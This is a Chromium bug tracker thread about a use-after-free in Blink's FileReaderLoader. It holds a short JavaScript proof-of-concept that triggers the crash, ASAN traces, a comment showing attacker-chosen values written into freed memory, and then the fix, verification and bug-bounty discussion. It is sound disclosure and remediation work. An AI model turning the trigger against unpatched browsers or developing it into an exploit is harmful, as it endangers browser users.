Security: FileReader - Use After Free in FileReaderLoader::OnCalculatedSize()
Reported by
loobeny...@gmail.com,
Apr 22 2018
|
||||||||||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
Steps to reproduce:
1.Open PoC UAF_OnCalculatedSize_PoC.html in Chrome browser ASAN Build.
2.ASAN reports a Use After Free in FileReaderLoader::OnCalculatedSize().
==13480==ERROR: AddressSanitizer: heap-use-after-free on address 0x125ad07b4348 at pc 0x7ff941011e71 bp 0x00a10f3fb3e0 sp 0x00a10f3fb428
WRITE of size 1 at 0x125ad07b4348 thread T0
#0 0x7ff941011e70 in blink::FileReaderLoader::OnCalculatedSize C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:283
VERSION
Chrome Version: Chromium 68.0.3404.0 (Developer Build) (64-bit)
Operating System: Windows 10
REPRODUCTION CASE (UAF_OnCalculatedSize_PoC.html)
<script>
var reader = new FileReader();
reader.onloadstart = function(e) {
reader.abort();
reader.readAsDataURL(new Blob([""], {type : "text/html"}));
}
reader.readAsText(new Blob([""], {type : "text/html"}));
</script>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
==13480==ERROR: AddressSanitizer: heap-use-after-free on address 0x125ad07b4348 at pc 0x7ff941011e71 bp 0x00a10f3fb3e0 sp 0x00a10f3fb428
WRITE of size 1 at 0x125ad07b4348 thread T0
#0 0x7ff941011e70 in blink::FileReaderLoader::OnCalculatedSize C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:283
#1 0x7ff93608751c in blink::mojom::blink::BlobReaderClientStubDispatch::Accept C:\b\c\b\win_asan_release\src\out\release_x64\gen\third_party\blink\public\mojom\blob\blob.mojom-blink.cc:133
#2 0x7ff938ac93a7 in mojo::InterfaceEndpointClient::HandleValidatedMessage C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\interface_endpoint_client.cc:419
#3 0x7ff938ab20bf in mojo::internal::MultiplexRouter::ProcessIncomingMessage C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\multiplex_router.cc:865
#4 0x7ff938ab1000 in mojo::internal::MultiplexRouter::Accept C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\multiplex_router.cc:589
#5 0x7ff938ac27f3 in mojo::Connector::ReadSingleMessage C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\connector.cc:443
#6 0x7ff938ac3d5e in mojo::Connector::ReadAllAvailableMessages C:\b\c\b\win_asan_release\src\mojo\public\cpp\bindings\lib\connector.cc:472
#7 0x7ff938af8fed in mojo::SimpleWatcher::OnHandleReady C:\b\c\b\win_asan_release\src\mojo\public\cpp\system\simple_watcher.cc:273
#8 0x7ff9389cb661 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:101
#9 0x7ff9380fff3c in blink::scheduler::internal::ThreadControllerImpl::DoWork C:\b\c\b\win_asan_release\src\third_party\blink\renderer\platform\scheduler\base\thread_controller_impl.cc:162
#10 0x7ff9389cb661 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:101
#11 0x7ff9388db3cd in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:319
#12 0x7ff9388dc7b7 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:373
#13 0x7ff938a37328 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:37
#14 0x7ff9388c4d14 in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:130
#15 0x7ff93df09859 in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:250
#16 0x7ff9387dbda9 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:633
#17 0x7ff9387dcf2e in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:922
#18 0x7ff9387fca6c in service_manager::Main C:\b\c\b\win_asan_release\src\services\service_manager\embedder\main.cc:452
#19 0x7ff9387db986 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:19
#20 0x7ff9344c1311 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:101
#21 0x7ff7e7747cd6 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:200
#22 0x7ff7e774236a in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:230
#23 0x7ff7e7a87638 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:283
#24 0x7ff9da8d1fe3 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.DLL+0x11fe3)
#25 0x7ff9dd32f060 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x6f060)
0x125ad07b4348 is located 264 bytes inside of 272-byte region [0x125ad07b4240,0x125ad07b4350)
freed by thread T0 here:
#0 0x7ff7e777a930 in free C:\b\rr\tmpf1ermk\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44
#1 0x7ff9410126c3 in blink::FileReaderLoader::~FileReaderLoader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:80
#2 0x7ff941014d50 in blink::FileReader::ExecutePendingRead C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:313
#3 0x7ff94101abb1 in blink::FileReader::ThrottlingController::PushReader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:137
#4 0x7ff941014aed in blink::FileReader::ThrottlingController::PushReader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:100
#5 0x7ff94101447d in blink::FileReader::ReadInternal C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:306
#6 0x7ff94029a324 in blink::V8FileReader::readAsDataURLMethodCallback C:\b\c\b\win_asan_release\src\out\release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_file_reader.cc:508
#7 0x7ff9362cfa87 in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments-inl.h:93
#8 0x7ff9362cc544 in v8::internal::`anonymous namespace'::HandleApiCallHelper<0> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:107
#9 0x7ff9362c935b in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:137
#10 0x7ff9362c86a6 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:125
#11 0x12b6d8404240 (<unknown module>)
previously allocated by thread T0 here:
#0 0x7ff7e777aa10 in malloc C:\b\rr\tmpf1ermk\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:60
#1 0x7ff935f8d983 in WTF::Partitions::FastMalloc C:\b\c\b\win_asan_release\src\third_party\blink\renderer\platform\wtf\allocator\partitions.h:121
#2 0x7ff94100d871 in blink::FileReaderLoader::Create C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:68
#3 0x7ff941014cbf in blink::FileReader::ExecutePendingRead C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:313
#4 0x7ff94101abb1 in blink::FileReader::ThrottlingController::PushReader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:137
#5 0x7ff941014aed in blink::FileReader::ThrottlingController::PushReader C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:100
#6 0x7ff94101447d in blink::FileReader::ReadInternal C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:306
#7 0x7ff9410148ec in blink::FileReader::readAsText C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader.cc:258
#8 0x7ff940299c0b in blink::V8FileReader::readAsTextMethodCallback C:\b\c\b\win_asan_release\src\out\release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_file_reader.cc:503
#9 0x7ff9362cfa87 in v8::internal::FunctionCallbackArguments::Call C:\b\c\b\win_asan_release\src\v8\src\api-arguments-inl.h:93
#10 0x7ff9362cc544 in v8::internal::`anonymous namespace'::HandleApiCallHelper<0> C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:107
#11 0x7ff9362c935b in v8::internal::Builtin_Impl_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:137
#12 0x7ff9362c86a6 in v8::internal::Builtin_HandleApiCall C:\b\c\b\win_asan_release\src\v8\src\builtins\builtins-api.cc:125
#13 0x12b6d8404240 (<unknown module>)
SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\blink\renderer\core\fileapi\file_reader_loader.cc:283 in blink::FileReaderLoader::OnCalculatedSize
Shadow bytes around the buggy address:
0x04822a876810: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x04822a876820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x04822a876830: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
0x04822a876840: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x04822a876850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x04822a876860: fd fd fd fd fd fd fd fd fd[fd]fa fa fa fa fa fa
0x04822a876870: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x04822a876880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x04822a876890: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x04822a8768a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x04822a8768b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==13480==ABORTING
,
Apr 23 2018
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=5674396262596608.
,
Apr 23 2018
,
Apr 23 2018
,
Apr 23 2018
,
Apr 23 2018
,
Apr 23 2018
Detailed report: https://clusterfuzz.com/testcase?key=5674396262596608 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: Heap-use-after-free WRITE 1 Crash Address: 0x613000049608 Crash State: blink::FileReaderLoader::OnCalculatedSize blink::mojom::blink::BlobReaderClientStubDispatch::Accept mojo::InterfaceEndpointClient::HandleValidatedMessage Sanitizer: address (ASAN) Recommended Security Severity: High Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=523898:523900 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5674396262596608 See https://github.com/google/clusterfuzz-tools for more information. The recommended severity is different from what was assigned to the bug. Please double check the accuracy of the assigned severity.
,
Apr 23 2018
Automatically applying components based on crash stacktrace and information from OWNERS files. If this is incorrect, please apply the Test-Predator-Wrong-Components label.
,
Apr 23 2018
It's worse in Stable and Beta.
In stable and beta, there is a byte member variable expected_content_size_ and it can corrupt multiple bytes of the freed memory:
void FileReaderLoader::OnCalculatedSize(uint64_t total_size,
uint64_t expected_content_size) {
OnStartLoading(expected_content_size);
expected_content_size_ = expected_content_size; // <--- 8 byte write
if (expected_content_size_ == 0) {
received_all_data_ = true;
return;
}
In DEV channel, expected_content_size_ no longer exists, the most easy write to trigger is one byte write to received_all_data_:
void FileReaderLoader::OnCalculatedSize(uint64_t total_size,
uint64_t expected_content_size) {
OnStartLoading(expected_content_size);
if (expected_content_size == 0) {
received_all_data_ = true; // <---------- 1 byte write
return;
}
Attached a PoC (UAF_OnCalculatedSize_PoC_WrittenValue_0x414141.html) that can write 0x414141 into the freed memory in Stable and Beta:
Chromium 67.0.3365.0 (Developer Build) (32-bit)
OS: Windows 10
Memory block of FileReaderLoader before it's freed.
0x57284390 5c 57 03 2b 02 00 00 00 30 f1 d4 58 00 00 00 00 \W.+....0ñÔX....
0x572843A0 20 62 86 38 00 00 00 00 00 ab ab ab 00 00 00 00 b.8.....«««....
0x572843B0 00 00 00 00 00 00 00 00 18 fa 4a 2d 00 00 00 00 .........úJ-....
0x572843C0 00 00 00 00 00 ab ab ab 00 00 00 00 00 00 00 00 .....«««........
0x572843D0 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 ÿÿÿÿÿÿÿÿ........
0x572843E0 00 00 00 00 3f 01 00 00 00 00 00 00 00 00 00 00 ....?...........
0x572843F0 90 6a f9 39 00 00 00 00 40 24 76 03 01 ab ab ab .jù9....@$v..«««
0x57284400 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <...............
0x57284410 00 00 00 00 00 ab ab ab 6a 57 03 2b 00 00 00 00 .....«««jW.+....
0x57284420 e8 43 28 57 30 42 9d 36 90 5c 9d 36 00 00 00 00 èC(W0B.6.\.6....
0x57284430 24 44 28 57 f4 58 03 2b 90 43 28 57 ab ab ab ab $D(WôX.+.C(W««««
0x57284440 ff ff ff ff ff ff ff ff 00 00 01 ab ab ab ab ab ÿÿÿÿÿÿÿÿ...«««««
0x57284450 de ad be ef ca fe d0 0d 13 37 f0 05 ba 11 ab 1e Þ..ïÊþÐ..7ð.º.«.
0x57284460 57 28 45 40 00 00 00 00 00 00 00 00 00 00 00 00 W(E@............
0x57284470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- this 0x57284390 {read_type_=kReadAsText (0x00000002) client_=0x58d4f130 {mixin_constructor_marker_={...} ...} ...} blink::FileReaderLoader *
+ blink::mojom::blink::BlobReaderClient {...} blink::mojom::blink::BlobReaderClient
read_type_ kReadAsText (0x00000002) blink::FileReaderLoader::ReadType
+ client_ 0x58d4f130 {mixin_constructor_marker_={...} state_=kLoading (0x00000001) loading_state_=kLoadingStateLoading (0x00000002) ...} blink::FileReaderLoaderClient * {blink::FileReader}
+ encoding_ {name_=0x00000000 <NULL> } WTF::TextEncoding
+ data_type_ [0x00000018] "application/octet-binary" WTF::String
+ raw_data_ empty std::unique_ptr<WTF::ArrayBufferBuilder,std::default_delete<WTF::ArrayBufferBuilder> >
is_raw_data_converted_ false bool
+ array_buffer_result_ null blink::Persistent<blink::DOMArrayBuffer>
+ string_result_ (null) WTF::String
+ decoder_ empty std::unique_ptr<blink::TextResourceDecoder,std::default_delete<blink::TextResourceDecoder> >
finished_loading_ false bool
bytes_loaded_ 0x0000000000000000 __int64
total_bytes_ 0xffffffffffffffff __int64
memory_usage_reported_to_v8_ 0x0000000000000000 __int64
error_code_ kOK (0x00000000) blink::FileError::ErrorCode
+ consumer_handle_ {handle_={...} } mojo::ScopedHandleBase<mojo::DataPipeConsumerHandle>
+ handle_watcher_ {sequence_checker_={...} arming_policy_=AUTOMATIC (0x00000000) task_runner_=[0x2d180760] 0x03762440 {queue_type_=kDefault (0x00000001) queue_class_=kNone (0x00000000) can_be_blocked_=false ...} ...} mojo::SimpleWatcher
+ binding_ {internal_state_={stub_={sink_=0x57284390 {read_type_=kReadAsText (0x00000002) client_=0x58d4f130 {mixin_constructor_marker_=...} ...} } } } mojo::Binding<blink::mojom::blink::BlobReaderClient,mojo::RawPtrImplRefTraits<blink::mojom::blink::BlobReaderClient> >
expected_content_size_ 0xffffffffffffffff __int64
received_all_data_ false bool
received_on_complete_ false bool
started_loading_ true bool
expected_content_size 0x0000000000414141 unsigned __int64
total_size 0x0000000000414141 unsigned __int64
Memory block of FileReaderLoader after it's freed:
0x57284390 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843A0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843B0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843C0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843D0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843E0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x572843F0 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284400 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284410 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284420 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284430 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284440 41 41 41 00 00 00 00 00 cd cd cd cd cd cd cd cd AAA.....ÍÍÍÍÍÍÍÍ
0x57284450 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
0x57284460 57 28 45 40 00 00 00 00 00 00 00 00 00 00 00 00 W(E@............
- this 0x57284390 {read_type_=0xcdcdcdcd client_=0xcdcdcdcd {...} encoding_={name_=0xcdcdcdcd <Error reading characters of string.> } ...} blink::FileReaderLoader *
+ blink::mojom::blink::BlobReaderClient {...} blink::mojom::blink::BlobReaderClient
read_type_ 0xcdcdcdcd blink::FileReaderLoader::ReadType
+ client_ 0xcdcdcdcd {...} blink::FileReaderLoaderClient *
+ encoding_ {name_=0xcdcdcdcd <Error reading characters of string.> } WTF::TextEncoding
+ data_type_ [???] ??? WTF::String
+ raw_data_ unique_ptr {bytes_used_=??? variable_capacity_=??? buffer_=[???] ??? ??? } std::unique_ptr<WTF::ArrayBufferBuilder,std::default_delete<WTF::ArrayBufferBuilder> >
is_raw_data_converted_ true (0xcd) bool
+ array_buffer_result_ {...} blink::Persistent<blink::DOMArrayBuffer>
+ string_result_ [???] ??? WTF::String
+ decoder_ unique_ptr {options_={encoding_detection_option_=??? content_type_=??? default_encoding_={name_=??? } ...} encoding_=...} std::unique_ptr<blink::TextResourceDecoder,std::default_delete<blink::TextResourceDecoder> >
finished_loading_ true (0xcd) bool
bytes_loaded_ 0xcdcdcdcdcdcdcdcd __int64
total_bytes_ 0xcdcdcdcdcdcdcdcd __int64
memory_usage_reported_to_v8_ 0xcdcdcdcdcdcdcdcd __int64
error_code_ 0xcdcdcdcd blink::FileError::ErrorCode
+ consumer_handle_ {handle_={...} } mojo::ScopedHandleBase<mojo::DataPipeConsumerHandle>
+ handle_watcher_ {sequence_checker_={...} arming_policy_=MANUAL | 0xcdcdcdcc (0xcdcdcdcd) task_runner_=[???] 0xcdcdcdcd {...} ...} mojo::SimpleWatcher
+ binding_ {internal_state_={stub_={sink_=0xcdcdcdcd {...} } } } mojo::Binding<blink::mojom::blink::BlobReaderClient,mojo::RawPtrImplRefTraits<blink::mojom::blink::BlobReaderClient> >
expected_content_size_ 0x0000000000414141 __int64
received_all_data_ true (0xcd) bool
received_on_complete_ true (0xcd) bool
started_loading_ true (0xcd) bool
expected_content_size 0x0000000000414141 unsigned __int64
total_size 0x0000000000414141 unsigned __int64
,
Apr 23 2018
,
Apr 23 2018
,
Apr 23 2018
Huh, this is weird... if FileReaderLoader is deleted (as is clearly the case here), its mojo::Binding binding_ member should also be deleted, which as far as I know should prevent any more messages from being dispatched through that binding... But clearly something isn't working right here.
,
Apr 23 2018
,
Apr 23 2018
,
Apr 23 2018
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/a261ea1c56ef16fc0fc4af1e440feb302d577716 commit a261ea1c56ef16fc0fc4af1e440feb302d577716 Author: Marijn Kruisselbrink <mek@chromium.org> Date: Mon Apr 23 20:17:19 2018 Fix use-after-free in FileReaderLoader. Anything that calls out to client_ can cause FileReaderLoader to be destroyed, so make sure to check for that situation. Bug: 835639 Change-Id: I57533d41b7118c06da17abec28bbf301e1f50646 Reviewed-on: https://chromium-review.googlesource.com/1024450 Commit-Queue: Marijn Kruisselbrink <mek@chromium.org> Commit-Queue: Daniel Murphy <dmurph@chromium.org> Reviewed-by: Daniel Murphy <dmurph@chromium.org> Cr-Commit-Position: refs/heads/master@{#552807} [modify] https://crrev.com/a261ea1c56ef16fc0fc4af1e440feb302d577716/third_party/blink/renderer/core/fileapi/file_reader_loader.cc [modify] https://crrev.com/a261ea1c56ef16fc0fc4af1e440feb302d577716/third_party/blink/renderer/core/fileapi/file_reader_loader.h
,
Apr 23 2018
,
Apr 24 2018
ClusterFuzz has detected this issue as fixed in range 552805:552808. Detailed report: https://clusterfuzz.com/testcase?key=5674396262596608 Job Type: linux_asan_chrome_mp Platform Id: linux Crash Type: Heap-use-after-free WRITE 1 Crash Address: 0x613000049608 Crash State: blink::FileReaderLoader::OnCalculatedSize blink::mojom::blink::BlobReaderClientStubDispatch::Accept mojo::InterfaceEndpointClient::HandleValidatedMessage Sanitizer: address (ASAN) Recommended Security Severity: High Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=523898:523900 Fixed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=552805:552808 Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5674396262596608 See https://github.com/google/clusterfuzz-tools for more information. If you suspect that the result above is incorrect, try re-doing that job on the test case report page.
,
Apr 24 2018
ClusterFuzz testcase 5674396262596608 is verified as fixed, so closing issue as verified. If this is incorrect, please add ClusterFuzz-Wrong label and re-open the issue.
,
Apr 24 2018
,
Apr 24 2018
I don't know if this is serious enough to also warrant merging back to M66, but just in case, adding that merge request as well...
,
Apr 24 2018
This bug requires manual review: Request affecting a post-stable build Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), josafat@(ChromeOS), abdulsyed@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Apr 24 2018
+ awhalley - can you please review how critical this is?
,
Apr 24 2018
Your change meets the bar and is auto-approved for M67. Please go ahead and merge the CL to branch 3396 manually. Please contact milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), govind@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Apr 24 2018
We can wait to 67.
,
Apr 24 2018
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/4c85c11d136df02e49f14d18f3b97bbf9413772f commit 4c85c11d136df02e49f14d18f3b97bbf9413772f Author: Marijn Kruisselbrink <mek@chromium.org> Date: Tue Apr 24 20:40:29 2018 Fix use-after-free in FileReaderLoader. Anything that calls out to client_ can cause FileReaderLoader to be destroyed, so make sure to check for that situation. TBR=mek@chromium.org (cherry picked from commit a261ea1c56ef16fc0fc4af1e440feb302d577716) Bug: 835639 Change-Id: I57533d41b7118c06da17abec28bbf301e1f50646 Reviewed-on: https://chromium-review.googlesource.com/1024450 Commit-Queue: Marijn Kruisselbrink <mek@chromium.org> Commit-Queue: Daniel Murphy <dmurph@chromium.org> Reviewed-by: Daniel Murphy <dmurph@chromium.org> Cr-Original-Commit-Position: refs/heads/master@{#552807} Reviewed-on: https://chromium-review.googlesource.com/1026524 Reviewed-by: Marijn Kruisselbrink <mek@chromium.org> Cr-Commit-Position: refs/branch-heads/3396@{#265} Cr-Branched-From: 9ef2aa869bc7bc0c089e255d698cca6e47d6b038-refs/heads/master@{#550428} [modify] https://crrev.com/4c85c11d136df02e49f14d18f3b97bbf9413772f/third_party/blink/renderer/core/fileapi/file_reader_loader.cc [modify] https://crrev.com/4c85c11d136df02e49f14d18f3b97bbf9413772f/third_party/blink/renderer/core/fileapi/file_reader_loader.h
,
Apr 30 2018
,
May 2 2018
,
May 4 2018
*** Boilerplate reminders! *** Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing. *********************************
,
May 4 2018
Nice one loobenyang@ - $3,000 for this one!
,
May 4 2018
,
May 7 2018
Thanks Andrew and the team for the quick fix. Does comment 9 quality for a higher reward? https://bugs.chromium.org/p/chromium/issues/detail?id=835639#c9 Sure this time, I did not demonstrate the control of EIP register, but it does demonstrate the control of the value used to corrupt the memory. The exploit of this issue is very likely. And according to the Chrome Reward Program Rules control of EIP is not the only criteria for higher reward. "[2] A report that includes a minimized test case and the versions of Chrome affected by the bug. You will also demonstrate that exploitation of this vulnerability is very likely (e.g. good control of EIP or another CPU register). Your report should be brief and well written with only necessary detail and commentary." If you have already taken it into consideration and the amount was decided based on it. Then just ignore this comment. Thanks again.
,
May 14 2018
Hi loobenyang@ - thanks for asking. We did indeed take this into account, I'm afraid (that was one of the reasons we raised it from medium to high in comment 27). Cheers!
,
May 29 2018
,
May 29 2018
,
Jun 15 2018
,
Jun 15 2018
,
Jul 31
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Jan 4
|
||||||||||||||||||||||||||||||
►
Sign in to add a comment |
||||||||||||||||||||||||||||||
Comment 1 by loobeny...@gmail.com
, Apr 22 2018